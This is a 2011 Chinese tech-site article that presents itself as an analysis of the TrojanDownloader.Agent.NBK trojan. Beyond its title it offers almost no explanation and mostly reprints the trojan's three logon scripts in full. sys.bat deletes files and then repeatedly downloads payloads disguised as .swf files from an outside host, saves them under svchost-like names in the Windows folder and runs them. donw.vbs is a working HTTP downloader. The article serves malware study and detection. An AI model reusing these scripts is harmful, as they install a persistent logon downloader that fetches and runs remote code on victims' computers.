知识屋:更实用的电脑技术知识网站
所在位置:首页 > 网络安全 > 病毒学院

解析TrojanDownloader.Agent.NBK木马脚本

发布时间:2011-06-21 14:48:55作者:知识屋

C:WINDOWSsystem32GroupPolicyUserScriptsLogon 目录下的三个文件
donw.vbs
shijian.vbs
sys.bat

 

sys.bat 内容:
 

@Echo Off
Del /f /s /q /a %SystemRoot%Websvchst.exe
:Next
Del /f /s /q /a %SystemRoot%Websvchst.bat
:Next
Del /f /s /q /a %SystemRoot%Websvchst.vbs
:Next
Del /f /s /q /a %SystemRoot%Websvchost.vbs
:Next
Del /f /s /q /a %SystemRoot%Websvchost.bat
:Next
Del /f /s /q /a %SystemRoot%Websvchost.exe
:Next
Del /f /s /q /a %SystemRoot%Websvchost1.bat
:Next
Del /f /s /q /a %SystemRoot%Websvchost1.exe
:Next
ping www.google.com &&Goto ok
Goto End
:ok
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201001.swf %SystemRoot%Websvchst.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogonshijian.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201002.swf %SystemRoot%Websvchst.bat
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogonshijian.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201003.swf %SystemRoot%Websvchst.exe
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogonshijian.vbs
:Next
start %SystemRoot%Websvchst.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201004.swf %SystemRoot%Websvchost.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogonshijian.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201005.swf %SystemRoot%Websvchost.bat
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogonshijian.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201006.swf %SystemRoot%Websvchost.exe
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201007.swf %SystemRoot%Websvchost1.bat
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogonshijian.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201008.swf %SystemRoot%Websvchost1.exe
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogonshijian.vbs
:Next
start %SystemRoot%Websvchost.vbs
Exit
:End
ping www.google.com &&Goto ok
Goto End
 

 

 

donw.vbs 内容:

on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
wscript.sleep 1
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,1
 
 

 


shijian.vbs 内容:

Dim Wsh
set ws=wscript.createobject("wscript.shell")
Wscript.Sleep 1000 
 

 

 

(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏
  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜